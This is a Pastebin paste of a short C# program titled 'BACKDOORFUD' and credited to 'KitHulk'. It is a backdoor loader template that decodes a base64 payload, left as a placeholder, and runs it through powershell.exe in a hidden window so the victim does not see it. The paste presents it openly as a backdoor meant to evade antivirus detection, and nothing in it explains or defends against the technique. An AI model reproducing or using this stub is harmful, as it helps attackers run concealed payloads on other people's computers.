Advertisement
anhkiet2507

C#

Mar 15th, 2017
13,839
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.67 KB | None | 0 0
  1. # Code by KitHulk
  2.  
  3. using System;
  4. using System.Collections.Generic;
  5. using System.Text;
  6.  
  7. namespace BACKDOORFUD
  8. {
  9.  
  10. class Program
  11. {
  12. static void Main(string[] args)
  13. {
  14. byte[] data = Convert.FromBase64String("code payload base64encode");
  15. string decodedString = Encoding.UTF8.GetString(data);
  16. System.Diagnostics.Process process = new System.Diagnostics.Process();
  17. System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
  18. startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden; startInfo.FileName = "powershell.exe";
  19. startInfo.Arguments = decodedString; process.StartInfo = startInfo; process.Start();
  20. }
  21. }
  22. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement